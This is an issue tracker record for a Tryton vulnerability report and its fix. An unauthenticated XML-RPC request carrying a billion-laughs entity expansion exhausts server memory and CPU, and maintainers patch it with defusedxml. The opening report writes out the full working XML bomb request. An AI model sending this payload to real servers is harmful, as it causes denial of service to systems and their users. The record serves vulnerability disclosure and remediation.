Issue 11244

Title
A non authenticated user can cause a denial of service with a single request using an xml bomb attack on xmlrpc
Priority
critical
Status
resolved
Nosy list
ced, jeremy.mousset, nicoe, pokoli, reviewbot, roundup-bot, yangoon
Assigned to
ced
Keywords
review

Created on 2022-02-11.13:03:34 by jeremy.mousset, last changed 7 months ago by roundup-bot.

Messages

New changeset 69e8f18f5682 by Cédric Krier in branch 'default':
Protect against XML vulnerabilities
https://hg.tryton.org/tryton-env/rev/69e8f18f5682
New changeset a64ca55b86e3 by Cédric Krier in branch 'default':
Protect against XML vulnerabilities
https://hg.tryton.org/trytond/rev/a64ca55b86e3

New changeset 2ef295408a0b by Cédric Krier in branch '6.2':
Protect against XML vulnerabilities
https://hg.tryton.org/trytond/rev/2ef295408a0b

New changeset b8e700d01652 by Cédric Krier in branch '6.0':
Protect against XML vulnerabilities
https://hg.tryton.org/trytond/rev/b8e700d01652

New changeset d0744bba5682 by Cédric Krier in branch '5.0':
Protect against XML vulnerabilities
https://hg.tryton.org/trytond/rev/d0744bba5682
New changeset f801a89c84e7 by Cédric Krier in branch 'default':
Protect against XML vulnerabilities
https://hg.tryton.org/proteus/rev/f801a89c84e7

New changeset e4019b6ca238 by Cédric Krier in branch '6.2':
Protect against XML vulnerabilities
https://hg.tryton.org/proteus/rev/e4019b6ca238

New changeset 973635df5e61 by Cédric Krier in branch '6.0':
Protect against XML vulnerabilities
https://hg.tryton.org/proteus/rev/973635df5e61

New changeset 85eb95f609cf by Cédric Krier in branch '5.0':
Protect against XML vulnerabilities
https://hg.tryton.org/proteus/rev/85eb95f609cf
Author: [hidden] (ced) Tryton committer Tryton translator
Date: 2022-02-22.22:54:49

I propose the March 1st to make the security release (with exiting bugfix) and the March 2nd to make the announce.

Author: [hidden] (jeremy.mousset)
Date: 2022-02-14.10:38:45

I have pyexpat.EXPAT_VERSION : 'expat_2.2.8'

Author: [hidden] (ced) Tryton committer Tryton translator
Date: 2022-02-12.17:30:29

Indeed the debian version with which we build tryton docker images, does not still have fixed expat. So it still makes sense to apply defusedxml in trytond and proteus.
I do not think we need to do it for tryton because the Windows and MacOS builds are used fixed expat libraries and also we parse only XML from user or the server (which are controlled).

Author: [hidden] (ced) Tryton committer Tryton translator
Date: 2022-02-12.15:14:42

Indeed normally stdlib should not be vulnerable to billion laughs if used with expat >= 2.4.1. Which version (pyexpat.EXPAT_VERSION) have you?

Author: [hidden] (ced) Tryton committer Tryton translator
Date: 2022-02-11.13:29:15

For me it is similar to issue11219 and should be fixed together.
Indeed we should apply the monkey patch on trytond which uses xmlrpc.client to parse XML-RPC request and on proteus which can be used as xmlrpc client.

Author: [hidden] (jeremy.mousset)
Date: 2022-02-11.13:03:34

Tested against trytond 6.2 with Python 3.8.10

A non authenticated user can saturate the trytond server's memory and CPU usage with a single xmlrpc request , using the billion laughs attack or other similar "xml bomb" attacks.

Request example [ do not test it against a production server of course :) ] :

url : http//example.trytond.com/
method: POST

headers:
Content-Type: text/xml

body:

<?xml version='1.0'?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<methodCall>
<methodName>&lol9;</methodName>
<params>
</params>
</methodCall>

When the trytond server receives the request, its RAM usage quickly skyrockets, and the CPU also becomes very busy.
When testing the request on my machine, the 16GB of RAM and 1 GB swap were full in under a minute.

defusedxml has a monkey patch for this.

If we use this monkey patch by adding the following to to trytond/protocols/xmlrpc.py:

 from defusedxml.xmlrpc import monkey_patch
 monkey_patch()

then the server will respond to the same request with :

"400 Bad Request: Unable to read XMl request".
(because the monkey patch forbids it)

So, it does looks like a simple protection against this attack and similar "xml bomb" attacks.

History
Date User Action Args
2022-03-01 19:58:29roundup-botsetmessages: + msg74388
2022-03-01 19:57:57roundup-botsetmessages: + msg74386
2022-03-01 19:57:13roundup-botsetmessages: + msg74384
status: testing -> resolved
2022-02-22 22:54:49cedsetmessages: + msg74306
2022-02-14 10:38:45jeremy.moussetsetmessages: + msg74099
2022-02-12 17:30:29cedsetmessages: + msg74062
2022-02-12 15:14:42cedsetmessages: + msg74055
2022-02-11 13:29:15cedsetassignedto: ced
component: + trytond, proteus
keyword: + review
messages: + msg74017
reviews: 381941002
status: unread -> testing
2022-02-11 13:12:55jeremy.moussetsettitle: A non authenticated use can cause a denial of service with a single request using an xml bomb attack on xmlrpc -> A non authenticated user can cause a denial of service with a single request using an xml bomb attack on xmlrpc
2022-02-11 13:03:34jeremy.moussetcreate